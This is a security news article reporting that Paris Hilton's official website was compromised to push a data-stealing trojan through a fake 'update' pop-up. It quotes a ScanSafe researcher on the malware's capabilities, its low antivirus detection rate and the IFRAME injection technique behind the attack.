Paris Hilton's website infects users with data-stealing trojan

By

The official website for Paris Hilton has been targeted by cybercriminals to distribute malware, and most anti-virus scanners are not detecting the threat.

Paris Hilton's website infects users with data-stealing trojan
The official website for Paris Hilton has been targeted by cybercriminals to distribute malware, and most anti-virus scanners are not detecting the threat.

Months after the celebrity and hotel heiress' Sidekick phone and Facebook profile were hacked, attackers now have turned to her official website to spread malware and steal data.

Users who visited ParisHilton.com during the weekend and on Monday were met with a pop-up box that informed them they needed to "update" their systems, according to web security firm ScanSafe, which first reported the infection on Monday. The dialogue box gave users the option to choose “cancel” or “OK," but any click downloaded the malware.

“Regardless of what you click, the execution will occur -- the download has already happened,” Mary Landesman, senior security researcher at ScanSafe, told SCMagazineUS.com. “The user is trapped. The user is a complete victim. All they did is visit a website.”

The infection was first detected by ScanSafe starting Friday was cleared late Monday night, the company said.

If infected, end-users risk having their banking credentials exposed, Landesman said. For enterprises, the malware can redirect and intercept all their HTTP and internal network traffic.

“Anything that can intercept web traffic is a pretty big cause for concern -- combined with the standard keylogging and data theft capabilities,” Landesman said. "On a scale of one to 10 for the malware you most don't want on your system, this would definitely be a 10."

Just seven out of 38 anti-virus scanners initially detected the exploit, she said. None of the mainstream anti-virus scanners picked it up, and the “vast majority” of people would not have gotten an alert from their AV software.

Landesman said she is unsure how the attackers were able to compromise the site, but a method such as SQL injection could be to blame.

What is standard about this compromise and others of this type is that an IFRAME and HTML element are embedded somewhere in the site to load malicious content from an attacker-owned site, Landesman said.

Cybercriminals use the trusted site, in this case ParisHilton.com, as a “net” to capture victims, she said.

The same malware also was detected on the website sexy-celeb-photos[dot]com, and other trusted sites, but the malicious code appears to have been rendered from you69tube[dot]com, Landesman said. Businesses should block that site, she said.

To clear this up on the website's end, operators must remove the malicious code, determine how and where the compromise occurred, and secure the vulnerabilities that led to the compromise, Landesman said.

A representative from ParisHilton.com could not be reached for comment.

See original article on scmagazineus.com
Got a news tip for our journalists? Share it with us anonymously here.
Copyright © SC Magazine, US edition
Tags:

Most Read Articles

Woolworths' CSO is Optus-bound

Woolworths' CSO is Optus-bound

Australia's super funds told to assess authentication controls

Australia's super funds told to assess authentication controls

Hackers abuse modified Salesforce app to steal data, extort companies

Hackers abuse modified Salesforce app to steal data, extort companies

The Northern Beaches Women's Shelter hones focus on tech-enabled abuse

The Northern Beaches Women's Shelter hones focus on tech-enabled abuse

Log In

  |  Forgot your password?